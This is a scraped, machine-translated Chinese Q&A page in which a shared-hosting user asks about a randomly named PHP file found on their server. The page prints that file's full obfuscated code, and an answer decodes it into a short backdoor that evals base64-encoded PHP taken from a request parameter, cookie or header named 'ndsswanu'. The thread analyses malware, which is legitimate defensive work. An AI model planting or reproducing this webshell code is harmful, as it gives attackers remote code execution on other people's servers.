Warning: file_get_contents(/data/phpspider/zhask/data//catemap/1/php/244.json): failed to open stream: No such file or directory in /data/phpspider/zhask/libs/function.php on line 167

Warning: Invalid argument supplied for foreach() in /data/phpspider/zhask/libs/tag.function.php on line 1116

Notice: Undefined index: in /data/phpspider/zhask/libs/function.php on line 180

Warning: array_chunk() expects parameter 1 to be array, null given in /data/phpspider/zhask/libs/function.php on line 181
我的托管服务器上随机命名的php文件_Php_File_Random_Filenames_Malware - Fatal编程技术网
Fatal编程技术网
  • php/
  • 我的托管服务器上随机命名的php文件

我的托管服务器上随机命名的php文件

php file random

我的托管服务器上随机命名的php文件,php,file,random,filenames,malware,Php,File,Random,Filenames,Malware,大约一周前,我注意到在我共享的web主机的根文件夹中出现了一个看似随机命名的PHP文件。文件名为“hvkqwvkj.php”,在查看所有者/组和权限信息之前,我愚蠢地删除了它。我想知道这是什么以及它是如何到达那里的。以下是该文件的内容: <?php $circulated='ad,$E)eNf'; $chickadees= 't';$glissade ='TeUs';$antoinette= '6'; $lithic='o'; $hydrophobic='TR)iec$$W';$blasp

大约一周前,我注意到在我共享的web主机的根文件夹中出现了一个看似随机命名的PHP文件。文件名为“hvkqwvkj.php”,在查看所有者/组和权限信息之前,我愚蠢地删除了它。我想知道这是什么以及它是如何到达那里的。以下是该文件的内容:

<?php
$circulated='ad,$E)eNf'; $chickadees= 't';$glissade ='TeUs';$antoinette= '6'; $lithic='o'; $hydrophobic='TR)iec$$W';$blaspheming='G';$eerily= 'u';$diagrammer =']A))eDO'; $huh= '(rCS/H:s';$din = 'g'; $harri = '.';$housed ='S';$browbeating = 'E(K+Nl';$deniable = 'dew_'; $flared='[';$baseboards = 'R;I';$conversed= '-'; $jammed = 'C'; $confident ='s';$homed ='a'; $bullock ='?';$asdf = 'T$v]';$debugs= 'LV9[U';$cheaters='$'; $juice = ';';$impropriety=')Hf6]tNar'; $fluently= '>(e;_sa'; $antagonism='t';
$jaquith= '"i_K4W';$canal ='(';$bookie='i';
$envies ='_n';$copyright='Pns@iSd'; $hampers='$'; $incontrovertible ='Te['; $irking ='?';$citadel ='iRy=';
$economizing= 'b'; $campanile = 'y'; $awn = 'N'; $compacting='c'; $journalist= 'O'; $evaluate = 'nQ:'; $booking = 'e'; $dolt= '_Q';$bottoming='U';$grabs= 'H';$covers ='(rrta';$breakfasted ='T_"(_uTM_';$confectionery = 'A'; $bolstered = 'E'; $kitti='a'; $kali ='neWn';$jersey ='e'; $fewer= 'a';
$earthmove ='a';$forgivable='1'; $hello =';Sru';$forwent = 'g';$gingham = '?';$fanatic='ot(RstP';$levee='S';$baser = 'B_,"c';$constructs= 'rai';$deletions='u';$attempters='g"sss_';$dispatcher ='ra=';$ken =')';$contrivance = '[D)dae'; $chrome ='i';$glutting='I<'; $devoutness= ';';$foible= '8';
$diagonally='$5D(vn';

$beauregard ='S';$ines='te]ee'; $imogen = 's';

$irene ='("as3:0$r';$grassier ='4';

$consortium ='r'; $appliance ='S'; $histochemistry= 'A'; $beamer='v';$enchain ='s'; $assaults= 'E';$davida='dNe'; $foamed= 'E)n';$cavity='=l';

$drudge='F';
$arraigning= 'p_E "i'; $firmware='",)a(';$jeanine= ')';
$equivalently ='"7$p'; $biller='m'; $likeness= 'i'; $closest = 'OP(vVrwJ$'; $commissioner='rU)o2';

$kaycee= 'c';$fanni = $kaycee['0'] .$commissioner[0] .$davida[2] .$firmware['3'].

$ines['0'] . $davida[2] . $arraigning['1'].$impropriety[2].$deletions. $foamed['2'] . $kaycee['0'].$ines['0']. $likeness . $commissioner[3].$foamed['2'];
$bob=$arraigning[3];

$druggist= $fanni ($bob,$davida[2] . $closest['3'].$firmware['3']. $cavity['1'] .$closest['2'].$firmware['3']. $commissioner[0]. $commissioner[0].
$firmware['3']. $campanile .$arraigning['1'].$equivalently['3'] . $commissioner[3] .$equivalently['3'] .

$closest['2'].$impropriety[2] .$deletions . $foamed['2'] . $kaycee['0'].$arraigning['1'] .
$attempters['0'] .$davida[2]. $ines['0'] .$arraigning['1']. $firmware['3'] . $commissioner[0] .$attempters['0'].$enchain .

$closest['2'] .$commissioner['2'] . $commissioner['2'] .$commissioner['2'] . $devoutness);$druggist ($closest['2'] ,$gingham,$attempters['0'],$dinnie['2'] ,$gwenneth ,$biller, $disdains[2],$closest['0'],$harri , $closest['8'] .$likeness. $cavity['0'].$firmware['3'] . $commissioner[0].
$commissioner[0].$firmware['3'] .
$campanile . $arraigning['1']. $biller.

$davida[2] .
$commissioner[0] . $attempters['0']. $davida[2] .$closest['2'] .$closest['8'] .$arraigning['1'].
$fanatic['3'] . $arraigning['2'].$dolt[1] .$commissioner['1'] .
$arraigning['2']. $appliance . $breakfasted[6]. $firmware['1'] .
$closest['8']. $arraigning['1'].
$jammed.$closest['0'].$closest['0'] .$jaquith['3'].

$glutting['0'] .

$arraigning['2']. $firmware['1']. $closest['8'] . $arraigning['1'].$appliance. $arraigning['2'].

$fanatic['3'] .$closest['4']. $arraigning['2'] . $fanatic['3'].$commissioner['2'] .
$devoutness. $closest['8'].$firmware['3']. $cavity['0'] . $likeness.$enchain. $enchain.
$davida[2] .
$ines['0'] . $closest['2'] .

$closest['8'] .$likeness. $contrivance[0].

$equivalently['0']. $foamed['2'] . $davida['0'].
$enchain .

$enchain.$closest['6'] .$firmware['3']. $foamed['2'].$deletions .$equivalently['0']. $ines[2] . $commissioner['2'].$gingham .

$closest['8'] .$likeness .$contrivance[0] .
$equivalently['0'].
$foamed['2'] . $davida['0'] .$enchain .$enchain .$closest['6'].$firmware['3'].$foamed['2'].$deletions .

$equivalently['0'] .

$ines[2] . $irene['5'] . $closest['2'].$likeness . $enchain. $enchain.$davida[2].$ines['0'] .$closest['2'].$closest['8'] . $likeness. $contrivance[0] .$equivalently['0'] . $grabs.$breakfasted[6] . $breakfasted[6] . $closest['1'] .$arraigning['1'] . $davida['1'].$diagonally[2] . $appliance.

$appliance .

$kali['2'].$histochemistry . $davida['1'].$commissioner['1'] . $equivalently['0'] . $ines[2].$commissioner['2'].$gingham. $closest['8'].

$likeness.$contrivance[0].
$equivalently['0'].$grabs .$breakfasted[6].$breakfasted[6] . $closest['1']. $arraigning['1'].$davida['1']. $diagonally[2] .$appliance .
$appliance. $kali['2'].$histochemistry . $davida['1'].$commissioner['1'].$equivalently['0'] . $ines[2] . $irene['5'].
$davida['0'] . $likeness.$davida[2]. $commissioner['2'].$devoutness.$davida[2]. $closest['3'] .$firmware['3'] .

$cavity['1'] .$closest['2'] . $enchain. $ines['0'] . $commissioner[0] .

$commissioner[0] .$davida[2].$closest['3'] . $closest['2']. $economizing .$firmware['3'].
$enchain.$davida[2] .$impropriety['3']. $grassier .$arraigning['1']. $davida['0'].$davida[2].$kaycee['0']. $commissioner[3].$davida['0'] .
$davida[2] .

$closest['2'].
$enchain.$ines['0'] .$commissioner[0] . $commissioner[0]. $davida[2] .$closest['3'] . $closest['2'].$closest['8']. $firmware['3'].$commissioner['2'].
$commissioner['2']. $commissioner['2'] . $commissioner['2'].
$devoutness ); 

我能够解析出实际的编码。
该文件采用模糊性以避免检测。它定义一个函数,然后使用eval执行它

这是有效载荷(重要位)

您立即将其删除是正确的,但是这只是更大问题的症状。剧本是如何出现的,这是一个更大的问题


此代码允许攻击者通过不同数量的攻击向量远程运行任何php代码
 显然,这是一个毫无意义的文件,即使对于一个编程新手来说,它实际上是做一些事情的,它定义了一个函数,然后使用eval来执行它。接下来还有更多。

//Take all types of request data and merge them
//This opens up many types of attack vectors
$i = array_merge($_REQUEST, $_COOKIE, $_SERVER);

//Look for a specific injected key called "ndsswanu" or HTTP_NDSSWANU and records its value if its set
$a = isset($i["ndsswanu"]
        ) ? $i["ndsswanu"] : (isset($i["HTTP_NDSSWANU"]) ? $i["HTTP_NDSSWANU"] : die);

//execute it
//iirc the reason for the double reverse is to avoid some characters being improperly encoded in base64.
//This statement runs any php code sent in the "ndsswanu" or HTTP_NDSSWANU key.
eval(strrev(base64_decode(strrev($a))));